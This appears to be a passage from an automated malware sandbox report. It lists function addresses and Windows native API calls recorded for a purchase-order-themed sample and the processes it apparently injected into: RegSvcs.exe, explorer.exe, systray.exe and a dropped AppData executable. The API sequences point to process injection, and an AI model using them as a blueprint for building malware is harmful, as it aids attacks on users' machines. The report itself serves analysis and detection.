Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2FE0 NtCreateFile,LdrInitializeThunk,14_2_04BA2FE0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2F30 NtCreateSection,LdrInitializeThunk,14_2_04BA2F30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2AD0 NtReadFile,LdrInitializeThunk,14_2_04BA2AD0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04BA2BF0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04BA2BE0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2B60 NtClose,LdrInitializeThunk,14_2_04BA2B60
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA35C0 NtCreateMutant,LdrInitializeThunk,14_2_04BA35C0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA4650 NtSuspendThread,14_2_04BA4650
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA4340 NtSetContextThread,14_2_04BA4340
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2CF0 NtOpenProcess,14_2_04BA2CF0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2CC0 NtQueryVirtualMemory,14_2_04BA2CC0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2C00 NtQueryInformationProcess,14_2_04BA2C00
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2DB0 NtEnumerateKey,14_2_04BA2DB0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2D30 NtUnmapViewOfSection,14_2_04BA2D30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2D00 NtSetInformationFile,14_2_04BA2D00
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2E80 NtReadVirtualMemory,14_2_04BA2E80
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2EE0 NtQueueApcThread,14_2_04BA2EE0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2E30 NtWriteVirtualMemory,14_2_04BA2E30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BA2FB0 NtResumeThread,14_2_04BA2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2FA0 NtQuerySection,14_2_04BA2FA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2F90 NtProtectVirtualMemory,14_2_04BA2F90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2F60 NtCreateProcessEx,14_2_04BA2F60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2AB0 NtWaitForSingleObject,14_2_04BA2AB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2AF0 NtWriteFile,14_2_04BA2AF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2BA0 NtEnumerateValueKey,14_2_04BA2BA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2B80 NtQueryInformationFile,14_2_04BA2B80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3090 NtSetValueKey,14_2_04BA3090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3010 NtOpenDirectoryObject,14_2_04BA3010
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3D10 NtOpenProcessToken,14_2_04BA3D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3D70 NtOpenThread,14_2_04BA3D70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA39B0 NtGetContextThread,14_2_04BA39B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA360 NtCreateFile,14_2_029EA360
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA490 NtClose,14_2_029EA490
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA410 NtReadFile,14_2_029EA410
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA540 NtAllocateVirtualMemory,14_2_029EA540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA3B2 NtCreateFile,14_2_029EA3B2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA35B NtCreateFile,14_2_029EA35B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA48B NtClose,14_2_029EA48B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA40A NtReadFile,14_2_029EA40A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,14_2_0497A036
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04979BAF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,14_2_04979BAF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497A042 NtQueryInformationProcess,14_2_0497A042
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04979BB2 NtCreateSection,NtMapViewOfSection,14_2_04979BB2
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E255880_2_04E25588
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E24D180_2_04E24D18
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E2EFD80_2_04E2EFD8
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E248E00_2_04E248E0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E251500_2_04E25150
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E272780_2_04E27278
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058BDD700_2_058BDD70
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B93380_2_058B9338
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058BD5100_2_058BD510
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B94CB0_2_058B94CB
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B64080_2_058B6408
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B64180_2_058B6418
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B6F500_2_058B6F50
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B6F600_2_058B6F60
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058BCF600_2_058BCF60
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B46B00_2_058B46B0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B46C00_2_058B46C0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B93280_2_058B9328
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041D8C49_2_0041D8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041EB719_2_0041EB71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402D889_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041DE5E9_2_0041DE5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00409E609_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019241A29_2_019241A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019301AA9_2_019301AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019281CC9_2_019281CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018601009_2_01860100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190A1189_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F81589_2_018F8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019020009_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019303E69_2_019303E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E3F09_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192A3529_2_0192A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F02C09_2_018F02C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019102749_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019305919_2_01930591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018705359_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191E4F69_2_0191E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019144209_2_01914420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019224469_2_01922446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186C7C09_2_0186C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018947509_2_01894750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018707709_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188C6E09_2_0188C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A09_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0193A9A69_2_0193A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018869629_2_01886962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018568B89_2_018568B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E8F09_2_0189E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018728409_2_01872840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187A8409_2_0187A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01926BD79_2_01926BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192AB409_2_0192AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA809_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01888DBF9_2_01888DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186ADE09_2_0186ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187AD009_2_0187AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190CD1F9_2_0190CD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910CB59_2_01910CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860CF29_2_01860CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870C009_2_01870C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EEFA09_2_018EEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862FC89_2_01862FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187CFE09_2_0187CFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01912F309_2_01912F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B2F289_2_018B2F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01890F309_2_01890F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E4F409_2_018E4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192CE939_2_0192CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882E909_2_01882E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192EEDB9_2_0192EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192EE269_2_0192EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870E599_2_01870E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187B1B09_2_0187B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A516C9_2_018A516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185F1729_2_0185F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0193B16B9_2_0193B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018770C09_2_018770C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191F0CC9_2_0191F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192F0E09_2_0192F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019270E99_2_019270E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B739A9_2_018B739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192132D9_2_0192132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185D34C9_2_0185D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018752A09_2_018752A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188B2C09_2_0188B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019112ED9_2_019112ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190D5B09_2_0190D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019395C39_2_019395C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019275719_2_01927571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192F43F9_2_0192F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018614609_2_01861460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192F7B09_2_0192F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019216CC9_2_019216CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B56309_2_018B5630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019059109_2_01905910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018799509_2_01879950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188B9509_2_0188B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018738E09_2_018738E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DD8009_2_018DD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188FB809_2_0188FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018ADBF99_2_018ADBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E5BF09_2_018E5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FB769_2_0192FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B5AA09_2_018B5AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01911AA39_2_01911AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190DAAC9_2_0190DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191DAC69_2_0191DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01927A469_2_01927A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FA499_2_0192FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E3A6C9_2_018E3A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188FDC09_2_0188FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01873D409_2_01873D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01921D5A9_2_01921D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01927D739_2_01927D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FCF29_2_0192FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E9C329_2_018E9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01871F929_2_01871F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FFB19_2_0192FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01833FD29_2_01833FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01833FD59_2_01833FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FF099_2_0192FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01879EB09_2_01879EB0
          Source: C:\Windows\explorer.exeCode function: 10_2_1035C03610_2_1035C036
          Source: C:\Windows\explorer.exeCode function: 10_2_1035308210_2_10353082
          Source: C:\Windows\explorer.exeCode function: 10_2_1035A91210_2_1035A912
          Source: C:\Windows\explorer.exeCode function: 10_2_10354D0210_2_10354D02
          Source: C:\Windows\explorer.exeCode function: 10_2_103605CD10_2_103605CD
          Source: C:\Windows\explorer.exeCode function: 10_2_1035D23210_2_1035D232
          Source: C:\Windows\explorer.exeCode function: 10_2_10357B3010_2_10357B30
          Source: C:\Windows\explorer.exeCode function: 10_2_10357B3210_2_10357B32
          Source: C:\Windows\explorer.exeCode function: 10_2_1047423210_2_10474232
          Source: C:\Windows\explorer.exeCode function: 10_2_1047303610_2_10473036
          Source: C:\Windows\explorer.exeCode function: 10_2_1046A08210_2_1046A082
          Source: C:\Windows\explorer.exeCode function: 10_2_1046BD0210_2_1046BD02
          Source: C:\Windows\explorer.exeCode function: 10_2_1047191210_2_10471912
          Source: C:\Windows\explorer.exeCode function: 10_2_1046EB3210_2_1046EB32
          Source: C:\Windows\explorer.exeCode function: 10_2_1046EB3010_2_1046EB30
          Source: C:\Windows\explorer.exeCode function: 10_2_104775CD10_2_104775CD
          Source: C:\Windows\explorer.exeCode function: 10_2_10ABC08210_2_10ABC082
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC503610_2_10AC5036
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC95CD10_2_10AC95CD
          Source: C:\Windows\explorer.exeCode function: 10_2_10ABDD0210_2_10ABDD02
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC391210_2_10AC3912
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC623210_2_10AC6232
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC0B3010_2_10AC0B30
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC0B3210_2_10AC0B32
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0608210_2_10C06082
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0F03610_2_10C0F036
          Source: C:\Windows\explorer.exeCode function: 10_2_10C135CD10_2_10C135CD
          Source: C:\Windows\explorer.exeCode function: 10_2_10C07D0210_2_10C07D02
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0D91210_2_10C0D912
          Source: C:\Windows\explorer.exeCode function: 10_2_10C1023210_2_10C10232
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0AB3010_2_10C0AB30
          Source: C:\Windows\explorer.exeCode function: 10_2_10C0AB3210_2_10C0AB32
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3558811_2_04B35588
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3E52011_2_04B3E520
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B34D1811_2_04B34D18
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3557911_2_04B35579
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B348E011_2_04B348E0
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3515011_2_04B35150
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeCode function: 11_2_04B3727811_2_04B37278
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1E4F614_2_04C1E4F6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2244614_2_04C22446
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1442014_2_04C14420
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C3059114_2_04C30591
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7053514_2_04B70535
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8C6E014_2_04B8C6E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6C7C014_2_04B6C7C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7077014_2_04B70770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B9475014_2_04B94750
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0200014_2_04C02000
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C281CC14_2_04C281CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C241A214_2_04C241A2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C301AA14_2_04C301AA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6010014_2_04B60100
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0A11814_2_04C0A118
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BF815814_2_04BF8158
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BF02C014_2_04BF02C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1027414_2_04C10274
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C303E614_2_04C303E6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7E3F014_2_04B7E3F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2A35214_2_04C2A352
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B60CF214_2_04B60CF2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C10CB514_2_04C10CB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B70C0014_2_04B70C00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B88DBF14_2_04B88DBF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6ADE014_2_04B6ADE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7AD0014_2_04B7AD00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0CD1F14_2_04C0CD1F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2EEDB14_2_04C2EEDB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B82E9014_2_04B82E90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2CE9314_2_04C2CE93
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2EE2614_2_04C2EE26
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B70E5914_2_04B70E59
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BEEFA014_2_04BEEFA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7CFE014_2_04B7CFE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B62FC814_2_04B62FC8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B90F3014_2_04B90F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB2F2814_2_04BB2F28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C12F3014_2_04C12F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BE4F4014_2_04BE4F40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B568B814_2_04B568B8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B9E8F014_2_04B9E8F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7284014_2_04B72840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7A84014_2_04B7A840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B729A014_2_04B729A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C3A9A614_2_04C3A9A6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8696214_2_04B86962
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6EA8014_2_04B6EA80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C26BD714_2_04C26BD7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2AB4014_2_04C2AB40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B6146014_2_04B61460
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2F43F14_2_04C2F43F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C0D5B014_2_04C0D5B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2757114_2_04C27571
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C216CC14_2_04C216CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB563014_2_04BB5630
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2F7B014_2_04C2F7B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C1F0CC14_2_04C1F0CC
